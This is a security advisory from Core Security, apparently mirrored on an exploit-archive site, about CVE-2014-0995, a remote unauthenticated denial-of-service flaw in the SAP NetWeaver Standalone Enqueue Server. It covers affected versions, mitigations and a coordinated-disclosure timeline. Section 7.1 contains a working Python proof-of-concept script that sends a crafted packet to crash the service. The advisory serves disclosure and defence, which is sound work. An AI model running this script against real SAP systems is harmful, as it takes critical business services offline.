Skip to content
cyberexploits
doswindowstext

SAP NetWeaver Enqueue Server - Denial of Service

SAP NetWeaver Enqueue Server - Denial of Service

Publié le 2014-10-17

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/windows/dos/35000.txt7eac4c3a
raw
Core Security - Corelabs Advisory

http://corelabs.coresecurity.com/



SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability



1. **Advisory Information**



Title: SAP Netweaver Enqueue Server Trace Pattern Denial of Service

Vulnerability

Advisory ID: CORE-2014-0007

Advisory URL:

http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability

Date published: 2014-10-15

Date of last update: 2014-10-15

Vendors contacted: SAP

Release mode: Coordinated release



2. **Vulnerability Information***

*

Class: Uncontrolled Recursion [CWE-674]

Impact: Denial of service

Remotely Exploitable: Yes

Locally Exploitable: No

CVE Name: CVE-2014-0995



3. **Vulnerability Description**



        SAP Netweaver [1] is a technology platform for building and

integrating SAP business

        applications. A vulnerability has been found in SAP Netweaver

that could allow an

        unauthenticated, remote attacker to create denial of service

conditions. The vulnerability

        is triggered by sending a specially crafted SAP Enqueue Server

packet to remote TCP port 32NN

        (NN being the SAP system number) of a host running the

"Standalone Enqueue Server" service, part

        of SAP Netweaver Application Server ABAP/Java. The "Standalone

Enqueue Server" is a critical

        component of a SAP Netweaver installation in terms of

availability, rendering the whole SAP

        system unresponsive.

    

4. **Vulnerable Packages**



   . SAP Netweaver 7.01 (enserver.exe version v7010.32.15.63503).

   . SAP Netweaver 7.20 (enserver.exe version v7200.70.18.23869).

  

    Other versions are probably affected too, but they were not checked.



5. **Vendor Information, Solutions and Workarounds**



        Martin Gallo proposed the following actions to mitigate the

impact of the vulnerabilities:



        Restrict access to the Standalone Enqueue service by configuring

Access Control Lists [4] and to

        the Standalone Enqueue Service TCP port 32XX (XX is the instance

number).

    

        SAP published a security note [3] with the fix.

    

6. **Credits**



      This vulnerability was discovered and researched by Martin Gallo

from Core Security Consulting

      Services. The publication of this advisory was coordinated by

Joaquín Rodríguez Varela from Core

      Advisories Team.

    

7. **Technical Description / Proof of Concept Code**



      When the trace level of the service is configured to stop logging

when a pattern is found [2], the

      service does not properly control the amount of recursion

resulting in a stack overflow exception.

      The vulnerability can be triggered remotely by setting the trace

level with a wildcard Trace Pattern.

      This vulnerability could allow a remote, unauthenticated attacker

to conduct a denial of service

      attack against the vulnerable systems, rendering the Enqueue

Server unavailable.

      

      The following python code can be used to trigger the vulnerability:

    

7.1. **Proof of Concept**



/-----

import socket, struct

from optparse import OptionParser



# Parse the target options

parser = OptionParser()

parser.add_option("-d", "--hostname", dest="hostname", help="Hostname",

default="localhost")

parser.add_option("-p", "--port", dest="port", type="int", help="Port

number", default=3200)

(options, args) = parser.parse_args()



def send_packet(sock, packet):

    packet = struct.pack("!I", len(packet)) + packet

    sock.send(packet)



# Connect

print "[*] Connecting to", options.hostname, "port", options.port

connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connection.connect((options.hostname, options.port))



print "[*] Sending crash packet"



crash = '\xab\xcd\xe1\x23'  # Magic bytes

crash+= '\x00\x00\x00\x00'  # Id

crash+= '\x00\x00\x00\x5b\x00\x00\x00\x5b'  # Packet/frag length

crash+= '\x03\x00\x00\x00'  # Destination/Opcode/MoreFrags/Type

crash+= 'ENC\x00'  # Admin Eye-catcher

crash+= '\x01\x00\x00\x00'  # Version

crash+= '#EAA'  # Admin Eye-catcher

crash+= '\x01\x00\x00\x00\x00'  # Len

crash+= '\x06\x00\x00\x00\x00\x00'  # Opcode/Flags/RC

crash+= '#EAE'  # Admin Eye-catcher

crash+= '\x01\x04\x00\x00'  # Version/Action/Limit/Tread

crash+= '\x00\x00\x00\x00'

crash+= '\x00\x00\x00\x03\x00\x00\x00\x03'  # Trace Level

crash+= '\x01'  # Logging

crash+= '\x01\x40\x00\x00'  # Max file size

crash+= '\x00\x00\x00\x01\x00\x00\x00\x01'  # No. patterns

crash+= '\x00\x00\x00\x25#EAH'  # Trace Eye-catcher

crash+= '\x01*\x00'  # Trace Pattern

crash+= '#EAD'  # Trace Eye-catcher



send_packet(connection, crash)

print "[*] Crash sent !"

-----/



8. **Report Timeline**



. 2014-06-02:



        Initial notification sent to SAP, including technical

description to reproduce the

        vulnerability. Publication date set to Jun 30, 2014.        



. 2014-06-03:



        Vendor notifies that the tracking number 1153917-2014 was

created for this issue.



. 2014-06-26:

        

        Core Security requests SAP to inform the status of the advisory.



. 2014-06-30:



        The vendor informs they were not able to reproduce the issue and

they request additional

        details and a proof of concept.



. 2014-06-30:

        

        Core Security sends SAP a full description of the vulnerability

including a python script

        to trigger it.

      

. 2014-07-11:

        

        Core Security asks if the vendor was able to trigger the

vulnerability. Additinally we

        requested to set a publication date for the advisory based on

the release of a fix.

      

. 2014-07-14:



        The vendor informs they were able to reproduce the issue but

they will not be able to provide

        a timeline for the fix at the time. They inform they will work

with high priority on it and

        will inform us of the planned fix release date.

      

. 2014-08-12:

        

        Core Security asks if the vendor was able to develop a fix and

if they have a possible timeline

        for its availability.

      

. 2014-08-13:



        The vendor informs that the fix is undergoing quality checks.

They also inform that they can't

        provide an exact date of publication yet. They also request a 3

months grace period once the

        patch is available.

      

. 2014-08-13:

        

        Core Security informs SAP that after we get notice that the fix

is available to the public we will

        publish the advisory accordingly and will not wait for the 3

months of grace as requested because

        that's not our proceeding policy.

      

. 2014-08-18:



        The vendor informs that the fix is going to be released with the

October patch day, on Tuesday the

        14th, of 2014.

      

. 2014-10-14:



        The vendor publishes the fix under the security note 2042845.



. 2014-10-15:



        Core Security releases the advisory.

      

9. **References**



[1] http://www.sap.com/platform/netweaver/index.epx.

[2]

http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/e929ca3d7001cee10000000a421937/content.htm?frameset=/en/47/ea3ef600e83b8be10000000a421937/frameset.htm

[3] SAP security note 2042845

[4] https://websmp230.sap-ag.de/sap/support/notes/1495075.

    

10. **About CoreLabs**



        CoreLabs, the research center of Core Security, is charged with

anticipating

        the future needs and requirements for information security

technologies.

        We conduct our research in several important areas of computer

security

        including system vulnerabilities, cyber attack planning and

simulation,

        source code auditing, and cryptography. Our results include problem

        formalization, identification of vulnerabilities, novel

solutions and

        prototypes for new technologies. CoreLabs regularly publishes

security

        advisories, technical papers, project information and shared

software

        tools for public use at: http://corelabs.coresecurity.com.

    

11. **About Core Security**



        Core Security enables organizations to get ahead of threats with

security

        test and measurement solutions that continuously identify and

demonstrate

        real-world exposures to their most critical assets. Our

customers can

        gain real visibility into their security standing, real

validation of

        their security controls, and real metrics to more effectively

secure their

        organizations.

        

        Core Security's software solutions build on over a decade of trusted

        research and leading-edge threat expertise from the company's

Security

        Consulting Services, CoreLabs and Engineering groups. Core Security

        can be reached at +1 (617) 399-6980 or on the Web at:

http://www.coresecurity.com.

    

12. **Disclaimer**



        The contents of this advisory are copyright (c) 2014 Core

Security and (c) 2014 CoreLabs, and

        are licensed under a Creative Commons Attribution Non-Commercial

Share-Alike 3.0 (United States) License:

        http://creativecommons.org/licenses/by-nc-sa/3.0/us/



13. **PGP/GPG Keys**



        This advisory has been signed with the GPG key of Core Security

advisories team, which is available for download at

       

http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

Voir sur GitHub